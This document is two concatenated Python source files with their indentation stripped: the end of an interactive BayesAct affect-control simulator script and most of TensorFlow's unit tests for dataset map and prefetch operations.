#-----------------------------------------------------------------------------------------------------------------------------
#these parameters can be tuned, but will generally work "out of the box" for a basic simulation
#-----------------------------------------------------------------------------------------------------------------------------
#behaviours file
self.fbfname="fbehaviours.dat"
#identities file
self.fifname="fidentities.dat"
#get some key parameters from the command line
#set much larger to mimic interact (>5000)
self.num_samples=500
# use 0.0 for mimic interact simulations
#roughening_noise=0.0
self.roughening_noise=self.num_samples**(-1.0/3.0)
#the observation noise
#set to 0.05 or less to mimic interact
self.obs_noise=0.1
if self.mimic_interact:
self.mimicInteract()
self.gamma_value=self.obs_noise
#for emotional agent - gamma value for observations of emotion
self.gammae_value = 0.1
#do we print out all the samples each time
self.learn_verbose=False
#for repeatability
self.rseed = NP.random.randint(0,382948932)
#rseed=271887164
NP.random.seed(self.rseed)
#if true, will use an EmotionalAgent from bayesactemot.py
#rather than an Agent from bayesact.py
self.useEmotionalAgent = False
self.helpstring="Bayesact interactive simulator (1 agent, 1 human) usage:\n bayesactinteractive.py\n\t -n <number of samples (default 500)>\n\t -a <agent knowledge (0,1,2) (Default 2)>\n\t -r <roughening noise: default n^(-1/3) - to use no roughening ('full' method), specify 0>\n\t -g <gamma_value (default 0.1)>\n\t -i <agent id label: default randomly chosen>\n\t -j <client id label: default randomly chosen>\n\t -k <agent gender (default: male) - only works if agent_id is specified with -i>\n\t -l (client gender (default: male) only works if client_id is specified with -j>\n\t -m <gammae_value (default 0.0 or emotions not used)>\n\t"
try:
self.opts, self.args = getopt.getopt(argv[1:],"huvon:t:x:a:c:d:r:e:g:m:i:j:k:l:",["help","n=","t=","x=","c=","a=","u=","d=","r=","e=","g=","m=","i=","j=","k=","l="])
except getopt.GetoptError:
print self.helpstring
sys.exit(2)
for opt, arg in self.opts:
if opt == '-h':
print self.helpstring
sys.exit()
elif opt == "-v":
self.learn_verbose=True
elif opt in ("-n", "--numsamples"):
self.num_samples = int(arg)
elif opt in ("-a", "--agentknowledge"):
self.agent_knowledge = int(arg)
elif opt in ("-r", "--roughen"):
self.roughening_noise=float(arg)
elif opt in ("-g", "--gamma"):
self.gamma_value=float(arg)
elif opt in ("-m", "--gammae"):
self.gammae_value=float(arg)
self.useEmotionalAgent = True
elif opt in ("-i", "--agentid"):
self.agent_id=arg
elif opt in ("-j", "--clientid"):
self.client_id=arg
elif opt in ("-k", "--agentgender"):
self.agent_gender=arg
elif opt in ("-l", "--clientgender"):
self.client_gender=arg
self.plotter=plotter
def mimicInteract(self):
self.bvagent_init=0.000001
self.bvclient_init=0.000001
self.bvagent=0.00001
self.bvclient=0.00001
self.agent_knowledge=2
self.num_samples=10000
self.roughening_noise=0.0
self.obs_noise=0.01
#FIXME: what does this do?
self.num_action_samples=10000
def startBayesactInteractive(self):
print "random seeed is : ",self.rseed
#-----------------------------------------------------------------------------------------------------------------------------
#code start - here there be dragons - only hackers should proceed, with caution
#-----------------------------------------------------------------------------------------------------------------------------
def is_array_of_floats(possarray):
try:
parr = [float(x) for x in possarray.split(',')]
except ValueError:
return False
if len(parr)==3:
return parr
return False
#a function to ask the client for a value (either string label or EPA vector)
# to take and map it to an EPA value. string labels and EPA are related through dictionary fbeh
# inputs who and what are just for printing messages describing what is going on
# inputs sugg_act and epaact are a default label or vector the use can choose one of easily
def ask_client(fbeh,sugg_act='',epaact=[],who="agent",what="action"):
sst=what+" to enact/display/take for "+who+" ('?' shows options): "
sstnc="You can now either :\n"
sstnc+="- pick an "+what+" and type in its label\n"
sstnc+="- type 'quit' to stop the simulation\n"
sstnc+="- type a comma separated list of three numbers to specify the "+what+" as E,P,A values\n"
if not sugg_act=='':
sstnc+="- hit 'enter' to take default "+what+" with label: "+sugg_act+"\n"
if not epaact=='':
sstnc+="- type any digit (0-9) to take suggsted "+what+": "+str(epaact)
while True:
cact = raw_input(sst)
if cact=='quit':
return []
elif cact=='' and not sugg_act=='':
cact=sugg_act
break
elif cact.isdigit() and not epaact==[]:
return epaact
elif re.sub(r"\s+","_",cact.strip()) in fbeh.keys():
cact=re.sub(r"\s+","_",cact.strip())
break
elif cact=="?":
print sstnc
elif is_array_of_floats(cact):
return [float(x) for x in cact.split(',')]
else:
print "incorrect or not found, try again. '?' shows options"
observ=map(lambda x: float (x), [fbeh[cact]["e"],fbeh[cact]["p"],fbeh[cact]["a"]])
print "client said: ",observ
return observ
fbehaviours_agent=readSentiments(self.fbfname,self.agent_gender)
fbehaviours_client=readSentiments(self.fbfname,self.client_gender)
(agent_mean_ids,agent_cov_ids)=getIdentityStats(self.fifname,self.agent_gender)
(client_mean_ids,client_cov_ids)=getIdentityStats(self.fifname,self.client_gender)
#the mean and covariance of IDs for male agents as taken from the databases
#should do this automatically in python based on actual genders of client/agent....as above now
#mean_ids=NP.array([0.40760,0.40548,0.45564])
#$cov_ids=NP.array([[2.10735,1.01121, 0.48442],[1.01121,1.22836,0.55593],[0.48442,0.55593,0.77040]])
#the actual (true) ids drawn from the distribution over ids, if not set to something in particular
self.agent_id=getIdentity(self.fifname,self.agent_id,self.agent_gender)
if self.agent_id==[]:
self.agent_id=NP.random.multivariate_normal(agent_mean_ids,agent_cov_ids)
self.agent_id=NP.asarray([self.agent_id]).transpose()
#here we get the identity of the client *as seen by the agent*
self.client_id=getIdentity(self.fifname,self.client_id,self.agent_gender)
if self.client_id==[]:
self.client_id = NP.random.multivariate_normal(client_mean_ids,client_cov_ids)
self.client_id=NP.asarray([self.client_id]).transpose()
#get initial sets of parameters for agent
(learn_tau_init,learn_prop_init,learn_beta_client_init,learn_beta_agent_init)=init_id(self.agent_knowledge,self.agent_id,self.client_id,client_mean_ids)
#overwrite these values for the interactive script only
#do this for mimicking interact
if self.mimic_interact:
learn_beta_agent_init=self.bvagent_init
learn_beta_client_init=self.bvclient_init
#initial x - only contains the turn for a default agent (no other x components)
learn_initx=self.initial_turn
#get the agent - can use some other subclass here if wanted
if self.useEmotionalAgent:
learn_agent=EmotionalAgent(N=self.num_samples,alpha_value=1.0,
gammae_value=self.gammae_value, gamma_value=self.gamma_value,
beta_value_agent=self.bvagent,beta_value_client=self.bvclient,
beta_value_client_init=learn_beta_client_init,beta_value_agent_init=learn_beta_agent_init,
client_gender=self.client_gender,agent_gender=self.agent_gender,
agent_rough=self.roughening_noise,client_rough=self.roughening_noise,use_pomcp=self.use_pomcp,
init_turn=self.initial_turn,numcact=self.numcact,numdact=self.numdact,obsres=self.obsres,
actres=self.actres,pomcp_timeout=self.timeout)
else:
learn_agent=Agent(N=self.num_samples,alpha_value=1.0,
gamma_value=self.gamma_value,beta_value_agent=self.bvagent,beta_value_client=self.bvclient,
beta_value_client_init=learn_beta_client_init,beta_value_agent_init=learn_beta_agent_init,
client_gender=self.client_gender,agent_gender=self.agent_gender,
agent_rough=self.roughening_noise,client_rough=self.roughening_noise,use_pomcp=self.use_pomcp,
init_turn=self.initial_turn,numcact=self.numcact,numdact=self.numdact,obsres=self.obsres,
actres=self.actres,pomcp_timeout=self.timeout)
print 10*"-","learning agent parameters: "
learn_agent.print_params()
print "learner init tau: ",learn_tau_init
print "learner prop init: ",learn_prop_init
print "learner beta client init: ",learn_beta_client_init
print "learner beta agent init: ",learn_beta_agent_init
#the following two initialisation calls should be inside the Agent constructor to keep things cleaner
learn_avgs=learn_agent.initialise_array(learn_tau_init,learn_prop_init,learn_initx)
#To plot initial data
if (None != self.plotter):
#to send the initial sentiments to the plotter
learn_agent.sendSamplesToPlotter(learn_agent.samples,self.plotter,eTurn.learner)
self.plotter.plot()
print "learner average sentiments (f): "
learn_avgs.print_val()
done = False
iter=0
while not done:
print 10*"-","iter ",iter,80*"-"
learn_avgs = learn_agent.getAverageState()
print "agent state is: "
learn_avgs.print_val()
#this always works here, but is only needed to avoid asking the user too many questions
#and to figure out the observation
learn_turn=learn_avgs.get_turn()
print learn_turn
observ=[]
#if use_pomcp or learn_turn=="agent":
#get the next action for the agent - may be a null action if it is the client turn
(learn_aab,learn_paab)=learn_agent.get_next_action(learn_avgs,exploreTree=True)
if learn_turn=="agent":
aact=findNearestBehaviour(learn_aab,fbehaviours_agent)
print "suggested action for the agent is :",learn_aab,"\n closest label is: ",aact
if self.useEmotionalAgent:
agentEmotion = learn_agent.expectedEmotion("agent")
clientEmotion = learn_agent.expectedEmotion("client")
clientEmotionLabel = learn_agent.findNearestEmotion(clientEmotion)
print "agent is feeling: ",agentEmotion," which is : ",learn_agent.findNearestEmotion(agentEmotion)
print "agent thinks client is feeling: ",clientEmotion," which is: ",clientEmotionLabel
if learn_turn=="agent":
#we only want to ask the user for an action if it is his turn,
#although this could be relaxed to allow the agent to barge in
#this will be relevant if the turn is non-deterministic, in which case there
#may be some samples for each turn value, and we may want an action to take??
learn_aab=ask_client(fbehaviours_agent,aact,learn_aab,learn_turn)
print "agent does action :",learn_aab,"\n"
learn_observ=[]
learn_eobserv=[]
else:
#first, see what the agent would predict and suggest this to the client
#this can be removed in a true interactive setting, so this is only here so we can see what is going on
(client_aab,client_paab)=learn_agent.get_default_predicted_action(learn_avgs)
aact=findNearestBehaviours(client_aab,fbehaviours_agent,10)
print "agent advises the following action :",client_aab,"\n closest labels are: ", [re.sub(r"_"," ",i.strip()) for i in aact]
#now, this is where the client actually decides what to do, possibly looking at the suggested labels from the agent
#we use fbehaviours_agent here (for agent gender) as it is the agent who is perceiving this
learn_observ=ask_client(fbehaviours_agent,aact[0],client_aab,learn_turn)
#should be to get a default (null) action from the agent
#learn_aab=[0.0,0.0,0.0]
print "client action: ",learn_observ
if self.useEmotionalAgent:
learn_eobserv = ask_client(learn_agent.emotdict,clientEmotionLabel,clientEmotion,learn_turn,"emotion")
#we may be done if the user has killed the interaction
if learn_turn=="client" and learn_observ==[]:
done = True
elif learn_turn=="agent" and learn_aab==[]:
done = True
else:
#agent gets to observe the turn each time
learn_xobserv=[State.turnnames.index(invert_turn(learn_turn))]
#the main SMC update step
if self.useEmotionalAgent:
learn_avgs=learn_agent.propagate_forward(learn_aab,learn_observ,learn_xobserv,learn_paab,verb=self.learn_verbose,plotter=self.plotter,agent=eTurn.learner,eobserv=learn_eobserv)
else:
learn_avgs=learn_agent.propagate_forward(learn_aab,learn_observ,learn_xobserv,learn_paab,verb=self.learn_verbose,plotter=self.plotter,agent=eTurn.learner)
#To plot data
if (None != self.plotter):
self.plotter.plot()
#I think these should be based on fundamentals, not transients
(aid,cid)=learn_agent.get_avg_ids(learn_avgs.f)
print "agent thinks it is most likely a: ",aid
print "agent thinks the client is most likely a: ",cid
if self.get_full_id_rate>0 and (iter+1)%self.get_full_id_rate==0:
(cnt_ags,cnt_cls)=learn_agent.get_all_ids()
print "agent thinks of itself as (full distribution): "
print cnt_ags[0:10]
print "agent thinks of the client as (full distribution): "
print cnt_cls[0:10]
if self.useEmotionalAgent:
agentEmotion = learn_agent.expectedEmotion("agent")
clientEmotion = learn_agent.expectedEmotion("client")
clientEmotionLabel = learn_agent.findNearestEmotion(clientEmotion)
print "agent is feeling: ",agentEmotion," which is : ",learn_agent.findNearestEmotion(agentEmotion)
print "agent thinks client is feeling: ",clientEmotion," which is: ",clientEmotionLabel
iter += 1
print "current deflection of averages: ",learn_agent.deflection_avg
learn_d=learn_agent.compute_deflection()
print "current deflection (agent's perspective): ",learn_d
if (None != self.plotter and None != self.plotter.m_PlotFrame):
self.plotter.m_PlotFrame.Close()
def main(argv):
plot = False
oBayesactInteractive = cBayesactInteractive(argv, plotter=None)
# A hack, should probably be fixed later
helpstring="Bayesact simulator (2 agents) usage:\n bayesactsim.py\n\t -t <number of trials (default 20)>\n\t -x <number of experiments per trial (default 10)>\n\t -n <number of samples (default 1000)>\n\t -c <client knowledge (0,1,2) (default 2)>\n\t -a <agent knowledge (0,1,2) (Default 0)>\n\t -u (if specified - do uniform draws)\n\t -d <max horizon - default 50>\n\t -r <roughening noise: default n^(-1/3) - to use no roughening ('full' method), specify 0>\n\t -e <environment noise (default 0.0)>\n\t -g <gamma_value (default 1.0)>\n\t -i <agent id label: default randomly chosen>\n\t -j <client id label: default randomly chosen>\n\t -k <agent gender (default: male) - only works if agent_id is specified with -i>\n\t -l (client gender (default: male) only works if client_id is specified with -j>\n\t -m <gammae_value (default 0.0 or emotions not used)>\n\t"
try:
opts, args = getopt.getopt(argv[1:],"huvon:t:x:a:c:d:r:e:g:i:j:m:k:l:",["help","n=","t=","x=","c=","a=","u=","d=","r=","e=","g=","i=","j=","k=","l="])
except getopt.GetoptError:
print helpstring
sys.exit(2)
for opt, arg in opts:
if "-o" == opt:
plot = True
if (False == plot):
oBayesactInteractive.startBayesactInteractive()
else:
from cPlotBayesactThread import cPlotBayesactThread
plotter = cPlotBayesactThread()
plotPanel = plotter.initFrame()
plotter.initPlotBayesactSim(plotPanel)
oBayesactInteractive.plotter = plotter
bayesactSimThread = threading.Thread(target=oBayesactInteractive.startBayesactInteractive)
plotter.setThread(bayesactSimThread)
plotter.startApp()
if __name__ == "__main__":
main(sys.argv)
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import time
import warnings
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components)
.map(_map_fn, num_parallel_calls=num_parallel_calls)
.prefetch(output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_parallel_calls = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(
components, count, num_parallel_calls, output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_parallel_calls_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(counter_var.initializer)
sess.run(init_op)
for i in range(10):
self.assertEqual(i, sess.run(counter_var))
self.assertEqual(i + 1, sess.run(get_next))
self.assertEqual(10, sess.run(counter_var))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
self.assertEqual(10, sess.run(counter_var))
def testCaptureUninitializedVariableError(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
with self.assertRaises(errors.NotFoundError):
sess.run(get_next)
def testSeededStatefulOperatorIsProperlyStateful(self):
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: random_ops.random_uniform((), seed=11)).batch(2)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
random_values = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values.extend(sess.run(get_next))
self.assertEqual(10, len(random_values))
self.assertGreater(np.abs(np.diff(random_values)).max(), 1e-6)
sess.run(init_op)
random_values_2 = []
with self.assertRaises(errors.OutOfRangeError):
while True:
random_values_2.extend(sess.run(get_next))
# Randomness is repeatable given same seed
self.assertAllClose(random_values, random_values_2)
def testMapDict(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: {"foo": x * 2, "bar": x ** 2})
.map(lambda d: d["foo"] + d["bar"])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual(i * 2 + i ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMapNamedtuple(self, count=10):
# construct dataset of tuples
labels = dataset_ops.Dataset.range(count)
images = labels.map(lambda l: -l)
dataset_tuple = dataset_ops.Dataset.zip((labels, images))
# convert dataset of tuples to dataset of namedtuples
example = namedtuple("Example", ["label", "image"])
dataset_namedtuple = dataset_tuple.map(example)
def preprocess_tuple(label, image):
image = 2 * image
return label, image
def preprocess_namedtuple(example):
return example._replace(image=2 * example.image)
# preprocess both datasets
dataset_tuple = dataset_tuple.map(preprocess_tuple)
dataset_namedtuple = dataset_namedtuple.map(preprocess_namedtuple)
next_tuple = dataset_tuple.make_one_shot_iterator().get_next()
next_namedtuple = dataset_namedtuple.make_one_shot_iterator().get_next()
# make sure both datasets contain the same data
with self.test_session() as sess:
for i in range(count):
tuple_, namedtuple_ = sess.run([next_tuple, next_namedtuple])
self.assertEqual(tuple_, namedtuple_)
self.assertEqual(tuple_, (i, -2 * i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(next_namedtuple)
def testUseStepContainerInMap(self):
row = np.arange(6)
iterator = (
dataset_ops.Dataset.from_tensors(row)
.map(lambda elems: functional_ops.map_fn(lambda x: x * x, elems))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
self.assertAllEqual(row ** 2, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetch(self):
# We will use this event to test that `_map_py_func()` has been
# invoked a certain number of times (6 times, to be exact) after
# consuming fewer elements from the iterator.
ev = threading.Event()
set_event_during_invocation = 5
def _map_py_func(x):
if x == set_event_during_invocation:
ev.set()
return x * x
def _map_fn(x):
return script_ops.py_func(_map_py_func, [x], x.dtype)
buffer_size_placeholder = array_ops.placeholder(dtypes.int64, shape=[])
iterator = (
dataset_ops.Dataset.range(100)
.map(_map_fn)
.prefetch(buffer_size_placeholder)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
# Simple test that prefetch yields the expected values in the
# expected order.
for buffer_size in [1, 10, 100, 1000]:
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# We can indirectly observe that varying the buffer size has the
# intended effect by observing when `ev` is set (on the 6th
# invocation of `_map_py_func()`).
# NOTE(mrry): We do not test with `buffer_size ==
# set_event_during_invocation`, because we must consume at least
# one element to start the prefetching.
for buffer_size in range(1, set_event_during_invocation):
event_will_be_set_after_consuming = (
set_event_during_invocation - buffer_size + 1)
ev.clear()
sess.run(init_op, feed_dict={buffer_size_placeholder: buffer_size})
for i in range(event_will_be_set_after_consuming):
self.assertFalse(ev.is_set())
self.assertEqual(i * i, sess.run(get_next))
ev.wait()
for i in range(event_will_be_set_after_consuming, 100):
self.assertEqual(i * i, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testReturnList(self):
iterator = (dataset_ops.Dataset.range(10)
.map(lambda x: [x, constant_op.constant(37.0)])
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testMultiOutputPyFunc(self):
# The `tf.py_func()` op returns a list of tensors for its outputs.
def _map_fn(x_tensor):
def _map_py_func(x):
return x, np.array(37.0, dtype=np.float64)
return script_ops.py_func(
_map_py_func, [x_tensor], [dtypes.int64, dtypes.float64])
iterator = (dataset_ops.Dataset.range(10)
.map(_map_fn)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
self.assertEqual((i, 37.0), sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def assertSparseValuesEqual(self, a, b):
self.assertAllEqual(a.indices, b.indices)
self.assertAllEqual(a.values, b.values)
self.assertAllEqual(a.dense_shape, b.dense_shape)
def testSparse(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
iterator = (dataset_ops.Dataset.range(10)
.map(_sparse)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for i in range(10):
actual = sess.run(get_next)
self.assertTrue(isinstance(actual, sparse_tensor.SparseTensorValue))
self.assertSparseValuesEqual(actual, _sparse(i))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testSparseChain(self):
def _sparse(i):
return sparse_tensor.SparseTensorValue(
indices=np.array([[0, 0]]),
values=(i * np.array([1])),
dense_shape=np.array([1, 1]))
def _check(i):
self.assertTrue(sparse_tensor.is_sparse(i))
return sparse_ops.sparse_concat(0, [i, i])
iterator = (
dataset_ops.Dataset.range(10).map(_sparse).map(_check)
.make_initializable_iterator())
init_op = iterator.initializer
